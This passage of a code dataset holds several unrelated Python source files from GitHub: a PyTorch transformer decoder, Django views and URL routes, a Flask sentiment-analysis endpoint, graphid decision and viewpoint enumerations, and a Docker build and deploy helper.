self.positional_encoding_seq(self.seq_emb(seq))\n tgt_mask = self.generate_square_subsequent_mask(seq.shape[1], seq.device)\n tgt_padding_mask = seq == PAD_ID\n outs = self.transformer_decoder(tgt=seq_emb, memory=memory, tgt_mask=tgt_mask, memory_mask=None,\n tgt_key_padding_mask=tgt_padding_mask, memory_key_padding_mask=None)\n return self.generator(outs)\n\n def init_decode_memory(self, memory: Tensor):\n self.clear_cache()\n return self.transformer_decoder.init_decode_memory(memory=memory, device=self.device)\n\n def decode_step(self, seq: Tensor, decode_memory: list, pos: Optional[int]=None, tgt_padding_mask: Tensor=None) -> Tensor:\n '''\n decode for single step\n :param seq: the new input words. shape: (batch_size, 1)\n :param decode_mem_list: the memory while decoding. 
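# Sketch of what generate_square_subsequent_mask() above produces: a lower-triangular
# float matrix with 1.0 where a position may attend (itself and earlier steps) and
# 0.0 strictly above the diagonal.
import torch

mask = 1.0 - torch.triu(torch.ones(4, 4), 1)
print(mask)  # rows: [1,0,0,0], [1,1,0,0], [1,1,1,0], [1,1,1,1]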
It stores the [key, value] for previous words.\n '''\n if seq.ndim == 1:\n seq = seq.unsqueeze(-1)\n if pos is None:\n pos = decode_memory[0][0].shape[1]\n if tgt_padding_mask is not None:\n assert tgt_padding_mask.shape[1] == pos + 1\n batch_size = seq.shape[0]\n memory = init_empty_tensor(batch_size=batch_size, d_model=self.d_model, device=self.device)\n seq_emb = self.positional_encoding_seq(x=self.seq_emb(seq), pos=(pos,))\n outs = self.transformer_decoder(tgt=seq_emb, memory=memory, tgt_mask=None, memory_mask=None,\n tgt_key_padding_mask=tgt_padding_mask, memory_key_padding_mask=None, \n decode_mem_list=decode_memory)\n return self.generator(outs).squeeze(1)\n\n def clear_cache(self):\n self.transformer_decoder.clear_cache()\n\n def display(self, displaying=True):\n self.displaying = displaying\n if not displaying:\n self.feature = None\n self.transformer_encoder.display(displaying=displaying)\n self.transformer_decoder.display(displaying=displaying)\n\n def get_attention(self):\n return self.transformer_decoder.get_attention()\n\n def get_feature(self):\n if self.displaying:\n return self.feature\n else:\n raise NotImplementedError(\"Not display mode! Cannot get the features.\")\n\n def get_encoder_output(self):\n return self.transformer_encoder.get_encoder_output()\n\n def get_decoder_output(self):\n return self.transformer_decoder.get_decoder_output()\n\n def generate_square_subsequent_mask(self, size: int, device: str):\n mask = 1.0 - torch.triu(torch.ones((size, size), device=device), 1)\n # mask = (torch.triu(torch.ones((size, size), device=device)) == 1).transpose(0, 1)\n # mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))\n return mask\n\nTransformerType = NewType('TransformerType', Img2SeqTransformer)\n\ndef _get_activation_fn(activation):\n if activation == \"relu\":\n return F.relu\n elif activation == \"gelu\":\n return F.gelu\n raise RuntimeError(\"activation should be relu/gelu, not {}\".format(activation))\n\ndef init_empty_tensor(batch_size: int, d_model: int, device):\n return torch.zeros((batch_size, 0, d_model), device=device)\n\n'''\ndef _cat(input: 'tuple[Tensor]', dim: int=0):\n input = tuple([x for x in input if x is not None])\n return torch.cat(input, dim=dim)\n'''","repo_name":"itoshiko/img2inchi","sub_path":"model/Transformer.py","file_name":"Transformer.py","file_ext":"py","file_size_in_byte":17000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20508870468","text":"from .misc import Credentials\n\n\nclass InvalidTesterTypeError(ValueError):\n def __init__(self, props: Credentials) -> None:\n self.props = props\n self.msg = f\"Can't identify Tester Type: {props.product}\"\n super().__init__(self.msg)\n\n\nclass TesterCommunicationError(Exception):\n def __init__(self, props: Credentials, error: Exception) -> None:\n self.props = props\n self.error = error\n self.msg = f\"Tester with credentials: {props} encountering communication error: {error}\"\n super().__init__(self.msg)\n\n\nclass IsDisconnectedError(Exception):\n \"\"\"Raises when tester is already disconnected.\"\"\"\n def __init__(self, tester_id) -> None:\n self.tester_id = tester_id\n self.msg = f\"Tester: <{self.tester_id}> is already disconnected.\"\n super().__init__(self.msg)\n\n\nclass IsConnectedError(Exception):\n \"\"\"Raises when tester is already connected.\"\"\"\n def __init__(self, tester_id) -> None:\n self.tester_id = tester_id\n self.msg = f\"Tester: <{self.tester_id}> is already 
connected.\"\n super().__init__(self.msg)\n\n\n# region Pool Exceptions\n\nclass UnknownResourceError(Exception):\n \"\"\"Raises when user trying to get acces to resource which is not known.\"\"\"\n def __init__(self, tester_id) -> None:\n self.tester_id = tester_id\n self.msg = f\"Unknown tester of id: <{self.tester_id}>.\"\n super().__init__(self.msg)\n\n# endregion\n","repo_name":"xenanetworks/open-automation-core","sub_path":"xoa_core/core/resources/resource/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"28158219023","text":"from django.conf.urls import url\n\nfrom . import views\n\n\n# HOME\nurlpatterns = [\n\n]\n\n# Partner\nurlpatterns += [\n url(r'^seznam/$', views.PartnerListView.as_view(), name='partner_list'),\n url(r'^(?P\\d+)/detail/$', views.PartnerDetailView.as_view(), name='partner_detail'),\n url(r'^create/$', views.PartnerCreateView.as_view(), name='partner_create'),\n url(r'^(?P\\d+)/update/$', views.PartnerUpdateView.as_view(), name='update'),\n url(r'^(?P\\d+)/update-komplet/$', views.PartnerUpdateKompletView.as_view(), name='partner_update_komplet'),\n # POP UP VIEWS\n url(r'^partner/popup-create/?$', views.PartnerPopupCreateView.as_view(), name='partner_popup_create'),\n url(r'^partner/popup-list/?$', views.PartnerPopUpListView.as_view(), name='partner_popup_list'),\n\n\n\n\n]\n\n# Oseba\nurlpatterns += [\n url(r'^oseba_create/$', views.OsebaCreateView.as_view(), name='oseba_create'),\n url(r'^oseba/popup-list/?$', views.OsebaPopUpListView.as_view(), name='oseba_popup_list'),\n]\n","repo_name":"vasjapavlovic/eda5","sub_path":"eda5/partnerji/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21014127790","text":"\"\"\" This is the main application. 
+{"seq_id":"21014127790","text":"\"\"\" This is the main application. It makes predictions on input text using a BERT model for sentiment analysis from Hugging Face. \"\"\"\r\n\r\nfrom flask import Flask, jsonify, render_template, request, make_response\r\nimport transformers\r\n\r\napp = Flask(__name__)\r\n\r\nhfmodel = transformers.pipeline('sentiment-analysis', model=\"nlptown/bert-base-multilingual-uncased-sentiment\")\r\n\r\n# Alternate model: Roberta, used for testing.\r\n# hfmodel = transformers.pipeline('sentiment-analysis', model=\"siebert/sentiment-roberta-large-english\")\r\n\r\n# inference\r\ndef get_prediction(message,model):\r\n    results = model(message)\r\n    return results\r\n\r\n@app.route('/', methods=['GET'])\r\ndef get():\r\n    \"\"\"\r\n    Demo test\r\n    :return: some text\r\n    \"\"\"\r\n    return jsonify({\"Working\": \"Good!\"})\r\n\r\n@app.route('/', methods=['POST'])\r\ndef predict():\r\n    message = request.json['text']\r\n    results = get_prediction(message, hfmodel)\r\n    my_prediction = f'The rating of this text is {results[0][\"label\"]} with probability of {results[0][\"score\"]*100}%.'\r\n    return my_prediction\r\n\r\nif __name__ == '__main__':\r\n    # starting app\r\n    app.run(debug=True,host='0.0.0.0')\r\n","repo_name":"pallavis08/flask_nginx_gunicorn","sub_path":"app/create_app.py","file_name":"create_app.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70945761433","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.contrib.auth import logout, login, authenticate\nfrom django.contrib.auth.forms import UserCreationForm\n# Create your views here.\n\n\ndef logout_view(request):\n    \"\"\"Log the user out and redirect to the home page.\"\"\"\n    logout(request)\n    return HttpResponseRedirect(reverse('learning_logs:index'))\n\n\ndef register(request):\n    \"\"\"Register a new user.\"\"\"\n    if request.method != 'POST':\n        # the empty registration form is displayed\n        form = UserCreationForm()\n    else:\n        # process the completed form\n        form = UserCreationForm(data=request.POST)\n\n        if form.is_valid():\n            new_user = form.save()\n            # let the user login automatically and redirect to the home page\n            authenticated_user = authenticate(\n                username=new_user.username, password=request.POST['password1'])\n            login(request, authenticated_user)\n            return HttpResponseRedirect(reverse('learning_logs:index'))\n\n    context = {'form': form}\n    return render(request, 'users/register.html', context)\n","repo_name":"heyefu19920626/PythonLearning","sub_path":"learning_log/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25388527776","text":"import ubelt as ub\r\n\r\n\r\nclass _Common:\r\n    ...\r\n\r\n\r\nclass _ConstHelper(type):\r\n    \"\"\"\r\n    Adds code and nice constants to an integer version of a class\r\n    \"\"\"\r\n    def __new__(cls, name, parents, dct):\r\n        \"\"\"\r\n        cls = META_DECISION\r\n        code_cls = META_DECISION_CODE\r\n        \"\"\"\r\n        class CODE:\r\n            pass\r\n\r\n        class NICE:\r\n            pass\r\n\r\n        for key in dct.keys():\r\n            if key.isupper():\r\n                value = dct[key]\r\n                if value is None or isinstance(value, int):\r\n                    code = dct['INT_TO_CODE'][value]\r\n                    nice = dct['INT_TO_NICE'][value]\r\n                    setattr(CODE, key, code)\r\n                    setattr(NICE, key, nice)\r\n\r\n        dct['CODE'] = CODE\r\n        dct['NICE'] = NICE\r\n        # we need to call type.__new__ to complete the initialization\r\n        return super(_ConstHelper, cls).__new__(cls, name, parents, dct)\r\n\r\n\r\n
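# Usage sketch, mirroring the doctest in META_DECISION below: the metaclass\r\n# copies every UPPERCASE integer constant onto the nested CODE / NICE\r\n# namespaces via INT_TO_CODE / INT_TO_NICE, so for the class defined next:\r\n#   EVIDENCE_DECISION.POSITIVE        -> 1\r\n#   EVIDENCE_DECISION.CODE.POSITIVE   -> 'POSTV'\r\n#   EVIDENCE_DECISION.NICE.POSITIVE   -> 'Positive'\r\n\r\n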
class EVIDENCE_DECISION(_Common, metaclass=_ConstHelper):\r\n    \"\"\"\r\n    TODO: change to EVIDENCE_DECISION / VISUAL_DECISION\r\n    Enumerated types of review codes and texts\r\n\r\n    Notes:\r\n        Unreviewed: Not compared yet.\r\n        nomatch: Visually comparable and different\r\n        match: Visually comparable and the same\r\n        notcomp: Not comparable means it is actually impossible to determine.\r\n        unknown: means that it was reviewed, but we just can't figure it out.\r\n    \"\"\"\r\n    UNREVIEWED = None\r\n    NEGATIVE = 0\r\n    POSITIVE = 1\r\n    INCOMPARABLE = 2\r\n    UNKNOWN = 3\r\n\r\n    INT_TO_CODE = ub.odict([\r\n        # (POSITIVE     , 'match'),\r\n        # (NEGATIVE     , 'nomatch'),\r\n        # (INCOMPARABLE , 'notcomp'),\r\n        # (POSITIVE     , 'positive'),\r\n        # (NEGATIVE     , 'negative'),\r\n        # (INCOMPARABLE , 'incomparable'),\r\n        # (UNKNOWN      , 'unknown'),\r\n        # (UNREVIEWED   , 'unreviewed'),\r\n        (POSITIVE     , 'POSTV'),\r\n        (NEGATIVE     , 'NEGTV'),\r\n        (INCOMPARABLE , 'INCMP'),\r\n        (UNKNOWN      , 'UNKWN'),\r\n        (UNREVIEWED   , 'UNREV'),\r\n    ])\r\n\r\n    INT_TO_NICE = ub.odict([\r\n        (POSITIVE     , 'Positive'),\r\n        (NEGATIVE     , 'Negative'),\r\n        (INCOMPARABLE , 'Incomparable'),\r\n        (UNKNOWN      , 'Unknown'),\r\n        (UNREVIEWED   , 'Unreviewed'),\r\n    ])\r\n\r\n    CODE_TO_NICE = ub.map_keys(INT_TO_CODE, INT_TO_NICE)\r\n    CODE_TO_INT = ub.invert_dict(INT_TO_CODE)\r\n    NICE_TO_CODE = ub.invert_dict(CODE_TO_NICE)\r\n    NICE_TO_INT = ub.invert_dict(INT_TO_NICE)\r\n\r\n    MATCH_CODE = CODE_TO_INT\r\n\r\n\r\nclass META_DECISION(_Common, metaclass=_ConstHelper):\r\n    \"\"\"\r\n    Enumerated types of review codes and texts\r\n\r\n    Notes:\r\n        unreviewed: we don't have a meta decision\r\n        same: we know this is the same animal through non-visual means\r\n        diff: we know this is a different animal through non-visual means\r\n\r\n    Example:\r\n        >>> assert hasattr(META_DECISION, 'CODE')\r\n        >>> assert hasattr(META_DECISION, 'NICE')\r\n        >>> code1 = META_DECISION.INT_TO_CODE[META_DECISION.NULL]\r\n        >>> code2 = META_DECISION.CODE.NULL\r\n        >>> assert code1 == code2\r\n        >>> nice1 = META_DECISION.INT_TO_NICE[META_DECISION.NULL]\r\n        >>> nice2 = META_DECISION.NICE.NULL\r\n        >>> assert nice1 == nice2\r\n    \"\"\"\r\n    NULL = None\r\n    DIFF = 0\r\n    SAME = 1\r\n    INT_TO_CODE = ub.odict([\r\n        (NULL , 'null'),\r\n        (DIFF , 'diff'),\r\n        (SAME , 'same'),\r\n    ])\r\n    INT_TO_NICE = ub.odict([\r\n        (NULL , 'NULL'),\r\n        (DIFF , 'Different'),\r\n        (SAME , 'Same'),\r\n    ])\r\n    CODE_TO_NICE = ub.map_keys(INT_TO_CODE, INT_TO_NICE)\r\n    CODE_TO_INT = ub.invert_dict(INT_TO_CODE)\r\n    NICE_TO_CODE = ub.invert_dict(CODE_TO_NICE)\r\n    NICE_TO_INT = ub.invert_dict(INT_TO_NICE)\r\n\r\n\r\nclass CONFIDENCE(_Common, metaclass=_ConstHelper):\r\n    UNKNOWN = None\r\n    GUESSING = 1\r\n    NOT_SURE = 2\r\n    PRETTY_SURE = 3\r\n    ABSOLUTELY_SURE = 4\r\n\r\n    INT_TO_CODE = ub.odict([\r\n        (ABSOLUTELY_SURE, 'absolutely_sure'),\r\n        (PRETTY_SURE, 'pretty_sure'),\r\n        (NOT_SURE, 'not_sure'),\r\n        (GUESSING, 'guessing'),\r\n        (UNKNOWN, 'unspecified'),\r\n    ])\r\n\r\n    INT_TO_NICE = ub.odict([\r\n        (ABSOLUTELY_SURE, 'Doubtless'),\r\n        (PRETTY_SURE, 'Sure'),\r\n        (NOT_SURE, 'Unsure'),\r\n        (GUESSING, 'Guessing'),\r\n        (UNKNOWN, 'Unspecified'),\r\n    ])\r\n\r\n    CODE_TO_NICE = ub.map_keys(INT_TO_CODE, INT_TO_NICE)\r\n    CODE_TO_INT = ub.invert_dict(INT_TO_CODE)\r\n    NICE_TO_CODE = ub.invert_dict(CODE_TO_NICE)\r\n    NICE_TO_INT = ub.invert_dict(INT_TO_NICE)\r\n\r\n\r\nclass QUAL(_Common, metaclass=_ConstHelper):\r\n    EXCELLENT = 5\r\n    GOOD = 4\r\n    OK = 3\r\n    
POOR = 2\r\n JUNK = 1\r\n UNKNOWN = None\r\n\r\n INT_TO_CODE = ub.odict([\r\n (EXCELLENT , 'excellent'),\r\n (GOOD , 'good'),\r\n (OK , 'ok'),\r\n (POOR , 'poor'),\r\n (JUNK , 'junk'),\r\n (UNKNOWN , 'unspecified'),\r\n ])\r\n\r\n INT_TO_NICE = ub.odict([\r\n (EXCELLENT , 'Excellent'),\r\n (GOOD , 'Good'),\r\n (OK , 'OK'),\r\n (POOR , 'Poor'),\r\n (JUNK , 'Junk'),\r\n (UNKNOWN , 'Unspecified'),\r\n ])\r\n\r\n CODE_TO_NICE = ub.map_keys(INT_TO_CODE, INT_TO_NICE)\r\n CODE_TO_INT = ub.invert_dict(INT_TO_CODE)\r\n NICE_TO_CODE = ub.invert_dict(CODE_TO_NICE)\r\n NICE_TO_INT = ub.invert_dict(INT_TO_NICE)\r\n\r\n\r\nclass VIEW(_Common, metaclass=_ConstHelper):\r\n \"\"\"\r\n categorical viewpoint using the faces of a Rhombicuboctahedron\r\n\r\n References:\r\n https://en.wikipedia.org/wiki/Rhombicuboctahedron\r\n \"\"\"\r\n UNKNOWN = None\r\n R = 1\r\n FR = 2\r\n F = 3\r\n FL = 4\r\n L = 5\r\n BL = 6\r\n B = 7\r\n BR = 8\r\n\r\n U = 9\r\n UF = 10\r\n UB = 11\r\n UL = 12\r\n UR = 13\r\n UFL = 14\r\n UFR = 15\r\n UBL = 16\r\n UBR = 17\r\n\r\n D = 18\r\n DF = 19\r\n DB = 20\r\n DL = 21\r\n DR = 22\r\n DFL = 23\r\n DFR = 24\r\n DBL = 25\r\n DBR = 26\r\n\r\n INT_TO_CODE = ub.odict([\r\n (UNKNOWN, 'unknown'),\r\n (R, 'right'),\r\n (FR, 'frontright'),\r\n (F, 'front'),\r\n (FL, 'frontleft'),\r\n (L, 'left'),\r\n (BL, 'backleft'),\r\n (B, 'back'),\r\n (BR, 'backright'),\r\n\r\n (U, 'up'),\r\n (UF, 'upfront'),\r\n (UB, 'upback'),\r\n (UL, 'upleft'),\r\n (UR, 'upright'),\r\n (UFL, 'upfrontleft'),\r\n (UFR, 'upfrontright'),\r\n (UBL, 'upbackleft'),\r\n (UBR, 'upbackright'),\r\n\r\n (D, 'down'),\r\n (DF, 'downfront'),\r\n (DB, 'downback'),\r\n (DL, 'downleft'),\r\n (DR, 'downright'),\r\n (DFL, 'downfrontleft'),\r\n (DFR, 'downfrontright'),\r\n (DBL, 'downbackleft'),\r\n (DBR, 'downbackright'),\r\n\r\n ])\r\n\r\n INT_TO_NICE = ub.odict([\r\n (UNKNOWN, 'Unknown'),\r\n (R, 'Right'),\r\n (FR, 'Front-Right'),\r\n (F, 'Front'),\r\n (FL, 'Front-Left'),\r\n (L, 'Left'),\r\n (BL, 'Back-Left'),\r\n (B, 'Back'),\r\n (BR, 'Back-Right'),\r\n\r\n (U, 'Up'),\r\n (UF, 'Up-Front'),\r\n (UB, 'Up-Back'),\r\n (UL, 'Up-Left'),\r\n (UR, 'Up-Right'),\r\n (UFL, 'Up-Front-Left'),\r\n (UFR, 'Up-Front-Right'),\r\n (UBL, 'Up-Back-Left'),\r\n (UBR, 'Up-Back-Right'),\r\n\r\n (D, 'Down'),\r\n (DF, 'Down-Front'),\r\n (DB, 'Down-Back'),\r\n (DL, 'Down-Left'),\r\n (DR, 'Down-Right'),\r\n (DFL, 'Down-Front-Left'),\r\n (DFR, 'Down-Front-Right'),\r\n (DBL, 'Down-Back-Left'),\r\n (DBR, 'Down-Back-Right'),\r\n ])\r\n\r\n CODE_TO_NICE = ub.map_keys(INT_TO_CODE, INT_TO_NICE)\r\n CODE_TO_INT = ub.invert_dict(INT_TO_CODE)\r\n NICE_TO_CODE = ub.invert_dict(CODE_TO_NICE)\r\n NICE_TO_INT = ub.invert_dict(INT_TO_NICE)\r\n\r\n DIST = {\r\n # DIST 0 PAIRS\r\n (B, B): 0, (BL, BL): 0, (BR, BR): 0, (D, D): 0, (DB, DB): 0,\r\n (DBL, DBL): 0, (DBR, DBR): 0, (DF, DF): 0, (DFL, DFL): 0,\r\n (DFR, DFR): 0, (DL, DL): 0, (DR, DR): 0, (F, F): 0, (FL, FL): 0,\r\n (FR, FR): 0, (L, L): 0, (R, R): 0, (U, U): 0, (UB, UB): 0,\r\n (UBL, UBL): 0, (UBR, UBR): 0, (UF, UF): 0, (UFL, UFL): 0,\r\n (UFR, UFR): 0, (UL, UL): 0, (UR, UR): 0,\r\n\r\n # DIST 1 PAIRS\r\n (B, BL): 1, (B, BR): 1, (B, DB): 1, (B, DBL): 1, (B, DBR): 1,\r\n (B, UB): 1, (B, UBL): 1, (B, UBR): 1, (BL, DBL): 1, (BL, L): 1,\r\n (BL, UBL): 1, (BR, DBR): 1, (BR, R): 1, (BR, UBR): 1, (D, DB): 1,\r\n (D, DBL): 1, (D, DBR): 1, (D, DF): 1, (D, DFL): 1, (D, DFR): 1,\r\n (D, DL): 1, (D, DR): 1, (DB, DBL): 1, (DB, DBR): 1, (DBL, DL): 1,\r\n (DBL, L): 1, (DBR, DR): 1, (DBR, R): 1, (DF, DFL): 1, (DF, DFR): 1,\r\n (DF, F): 
1, (DFL, DL): 1, (DFL, F): 1, (DFL, FL): 1, (DFL, L): 1,\r\n (DFR, DR): 1, (DFR, F): 1, (DFR, FR): 1, (DFR, R): 1, (DL, L): 1,\r\n (DR, R): 1, (F, FL): 1, (F, FR): 1, (F, UF): 1, (F, UFL): 1,\r\n (F, UFR): 1, (FL, L): 1, (FL, UFL): 1, (FR, R): 1, (FR, UFR): 1,\r\n (L, UBL): 1, (L, UFL): 1, (L, UL): 1, (R, UBR): 1, (R, UFR): 1,\r\n (R, UR): 1, (U, UB): 1, (U, UBL): 1, (U, UBR): 1, (U, UF): 1,\r\n (U, UFL): 1, (U, UFR): 1, (U, UL): 1, (U, UR): 1, (UB, UBL): 1,\r\n (UB, UBR): 1, (UBL, UL): 1, (UBR, UR): 1, (UF, UFL): 1, (UF, UFR): 1,\r\n (UFL, UL): 1, (UFR, UR): 1,\r\n\r\n # DIST 2 PAIRS\r\n (B, D): 2, (B, DL): 2, (B, DR): 2, (B, L): 2, (B, R): 2, (B, U): 2,\r\n (B, UL): 2, (B, UR): 2, (BL, BR): 2, (BL, D): 2, (BL, DB): 2,\r\n (BL, DBR): 2, (BL, DFL): 2, (BL, DL): 2, (BL, FL): 2, (BL, U): 2,\r\n (BL, UB): 2, (BL, UBR): 2, (BL, UFL): 2, (BL, UL): 2, (BR, D): 2,\r\n (BR, DB): 2, (BR, DBL): 2, (BR, DFR): 2, (BR, DR): 2, (BR, FR): 2,\r\n (BR, U): 2, (BR, UB): 2, (BR, UBL): 2, (BR, UFR): 2, (BR, UR): 2,\r\n (D, F): 2, (D, FL): 2, (D, FR): 2, (D, L): 2, (D, R): 2, (DB, DF): 2,\r\n (DB, DFL): 2, (DB, DFR): 2, (DB, DL): 2, (DB, DR): 2, (DB, L): 2,\r\n (DB, R): 2, (DB, UB): 2, (DB, UBL): 2, (DB, UBR): 2, (DBL, DBR): 2,\r\n (DBL, DF): 2, (DBL, DFL): 2, (DBL, DFR): 2, (DBL, DR): 2, (DBL, FL): 2,\r\n (DBL, UB): 2, (DBL, UBL): 2, (DBL, UBR): 2, (DBL, UFL): 2,\r\n (DBL, UL): 2, (DBR, DF): 2, (DBR, DFL): 2, (DBR, DFR): 2, (DBR, DL): 2,\r\n (DBR, FR): 2, (DBR, UB): 2, (DBR, UBL): 2, (DBR, UBR): 2,\r\n (DBR, UFR): 2, (DBR, UR): 2, (DF, DL): 2, (DF, DR): 2, (DF, FL): 2,\r\n (DF, FR): 2, (DF, L): 2, (DF, R): 2, (DF, UF): 2, (DF, UFL): 2,\r\n (DF, UFR): 2, (DFL, DFR): 2, (DFL, DR): 2, (DFL, FR): 2, (DFL, UBL): 2,\r\n (DFL, UF): 2, (DFL, UFL): 2, (DFL, UFR): 2, (DFL, UL): 2, (DFR, DL): 2,\r\n (DFR, FL): 2, (DFR, UBR): 2, (DFR, UF): 2, (DFR, UFL): 2,\r\n (DFR, UFR): 2, (DFR, UR): 2, (DL, DR): 2, (DL, F): 2, (DL, FL): 2,\r\n (DL, UBL): 2, (DL, UFL): 2, (DL, UL): 2, (DR, F): 2, (DR, FR): 2,\r\n (DR, UBR): 2, (DR, UFR): 2, (DR, UR): 2, (F, L): 2, (F, R): 2,\r\n (F, U): 2, (F, UL): 2, (F, UR): 2, (FL, FR): 2, (FL, U): 2,\r\n (FL, UBL): 2, (FL, UF): 2, (FL, UFR): 2, (FL, UL): 2, (FR, U): 2,\r\n (FR, UBR): 2, (FR, UF): 2, (FR, UFL): 2, (FR, UR): 2, (L, U): 2,\r\n (L, UB): 2, (L, UF): 2, (R, U): 2, (R, UB): 2, (R, UF): 2, (UB, UF): 2,\r\n (UB, UFL): 2, (UB, UFR): 2, (UB, UL): 2, (UB, UR): 2, (UBL, UBR): 2,\r\n (UBL, UF): 2, (UBL, UFL): 2, (UBL, UFR): 2, (UBL, UR): 2, (UBR, UF): 2,\r\n (UBR, UFL): 2, (UBR, UFR): 2, (UBR, UL): 2, (UF, UL): 2, (UF, UR): 2,\r\n (UFL, UFR): 2, (UFL, UR): 2, (UFR, UL): 2, (UL, UR): 2,\r\n\r\n # DIST 3 PAIRS\r\n (B, DF): 3, (B, DFL): 3, (B, DFR): 3, (B, FL): 3, (B, FR): 3,\r\n (B, UF): 3, (B, UFL): 3, (B, UFR): 3, (BL, DF): 3, (BL, DFR): 3,\r\n (BL, DR): 3, (BL, F): 3, (BL, R): 3, (BL, UF): 3, (BL, UFR): 3,\r\n (BL, UR): 3, (BR, DF): 3, (BR, DFL): 3, (BR, DL): 3, (BR, F): 3,\r\n (BR, L): 3, (BR, UF): 3, (BR, UFL): 3, (BR, UL): 3, (D, UB): 3,\r\n (D, UBL): 3, (D, UBR): 3, (D, UF): 3, (D, UFL): 3, (D, UFR): 3,\r\n (D, UL): 3, (D, UR): 3, (DB, F): 3, (DB, FL): 3, (DB, FR): 3, (DB, U): 3,\r\n (DB, UFL): 3, (DB, UFR): 3, (DB, UL): 3, (DB, UR): 3, (DBL, F): 3,\r\n (DBL, FR): 3, (DBL, R): 3, (DBL, U): 3, (DBL, UF): 3, (DBL, UR): 3,\r\n (DBR, F): 3, (DBR, FL): 3, (DBR, L): 3, (DBR, U): 3, (DBR, UF): 3,\r\n (DBR, UL): 3, (DF, U): 3, (DF, UBL): 3, (DF, UBR): 3, (DF, UL): 3,\r\n (DF, UR): 3, (DFL, R): 3, (DFL, U): 3, (DFL, UB): 3, (DFL, UR): 3,\r\n (DFR, L): 3, (DFR, U): 3, (DFR, UB): 3, (DFR, UL): 3, 
(DL, FR): 3,\r\n (DL, R): 3, (DL, U): 3, (DL, UB): 3, (DL, UBR): 3, (DL, UF): 3,\r\n (DL, UFR): 3, (DR, FL): 3, (DR, L): 3, (DR, U): 3, (DR, UB): 3,\r\n (DR, UBL): 3, (DR, UF): 3, (DR, UFL): 3, (F, UB): 3, (F, UBL): 3,\r\n (F, UBR): 3, (FL, R): 3, (FL, UB): 3, (FL, UBR): 3, (FL, UR): 3,\r\n (FR, L): 3, (FR, UB): 3, (FR, UBL): 3, (FR, UL): 3, (L, UBR): 3,\r\n (L, UFR): 3, (L, UR): 3, (R, UBL): 3, (R, UFL): 3, (R, UL): 3,\r\n\r\n # DIST 4 PAIRS\r\n (B, F): 4, (BL, FR): 4, (BR, FL): 4, (D, U): 4, (DB, UF): 4,\r\n (DBL, UFR): 4, (DBR, UFL): 4, (DF, UB): 4, (DFL, UBR): 4,\r\n (DFR, UBL): 4, (DL, UR): 4, (DR, UL): 4, (L, R): 4,\r\n\r\n # UNDEFINED DIST PAIRS\r\n (B, UNKNOWN): None, (BL, UNKNOWN): None, (BR, UNKNOWN): None,\r\n (D, UNKNOWN): None, (DB, UNKNOWN): None, (DBL, UNKNOWN): None,\r\n (DBR, UNKNOWN): None, (DF, UNKNOWN): None, (DFL, UNKNOWN): None,\r\n (DFR, UNKNOWN): None, (DL, UNKNOWN): None, (DR, UNKNOWN): None,\r\n (F, UNKNOWN): None, (FL, UNKNOWN): None, (FR, UNKNOWN): None,\r\n (L, UNKNOWN): None, (R, UNKNOWN): None, (U, UNKNOWN): None,\r\n (UB, UNKNOWN): None, (UBL, UNKNOWN): None, (UBR, UNKNOWN): None,\r\n (UF, UNKNOWN): None, (UFL, UNKNOWN): None, (UFR, UNKNOWN): None,\r\n (UL, UNKNOWN): None, (UNKNOWN, B): None, (UNKNOWN, BL): None,\r\n (UNKNOWN, BR): None, (UNKNOWN, D): None, (UNKNOWN, DB): None,\r\n (UNKNOWN, DBL): None, (UNKNOWN, DBR): None, (UNKNOWN, DF): None,\r\n (UNKNOWN, DFL): None, (UNKNOWN, DFR): None, (UNKNOWN, DL): None,\r\n (UNKNOWN, DR): None, (UNKNOWN, F): None, (UNKNOWN, FL): None,\r\n (UNKNOWN, FR): None, (UNKNOWN, L): None, (UNKNOWN, R): None,\r\n (UNKNOWN, U): None, (UNKNOWN, UB): None, (UNKNOWN, UBL): None,\r\n (UNKNOWN, UBR): None, (UNKNOWN, UF): None, (UNKNOWN, UFL): None,\r\n (UNKNOWN, UFR): None, (UNKNOWN, UL): None, (UNKNOWN, UR): None,\r\n (UR, UNKNOWN): None, (UNKNOWN, UNKNOWN): None,\r\n }\r\n # make distance symmetric\r\n for (f1, f2), d in list(DIST.items()):\r\n DIST[(f2, f1)] = d\r\n\r\n\r\nPOSTV = EVIDENCE_DECISION.CODE.POSITIVE\r\nNEGTV = EVIDENCE_DECISION.CODE.NEGATIVE\r\nINCMP = EVIDENCE_DECISION.CODE.INCOMPARABLE\r\nUNREV = EVIDENCE_DECISION.CODE.UNREVIEWED\r\nUNKWN = EVIDENCE_DECISION.CODE.UNKNOWN\r\n\r\nSAME = META_DECISION.CODE.SAME\r\nDIFF = META_DECISION.CODE.DIFF\r\nNULL = META_DECISION.CODE.NULL\r\n\r\nUNINFERABLE = (INCMP, UNREV, UNKWN)\r\n\r\n\r\nif __name__ == '__main__':\r\n \"\"\"\r\n CommandLine:\r\n python ~/code/graphid/graphid.core/state.py all\r\n \"\"\"\r\n import xdoctest\r\n xdoctest.doctest_module(__file__)\r\n","repo_name":"Erotemic/graphid","sub_path":"graphid/core/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":15342,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"42589757077","text":"import subprocess\nfrom environment_variables import load_env as le\n\ndef docker_test(container_name, port='8080'):\n '''\n docker function to build a container and test it locally\n '''\n # building the container\n subprocess.run(f\"docker build -t {container_name} .\", shell=True)\n\n # running the container on the 8080 port (by default, can be overwritte)\n subprocess.run(f\"docker run -e PORT=8000 -p {port}:8000 container\", shell=True) #\n\ndef docker_deploy():\n # Getting env variables defined in the env folder\n gcp_project_id, docker_image_name, gcr_multi_region, gcr_region = le.get_env_variables()\n\n build = f\"docker build -t 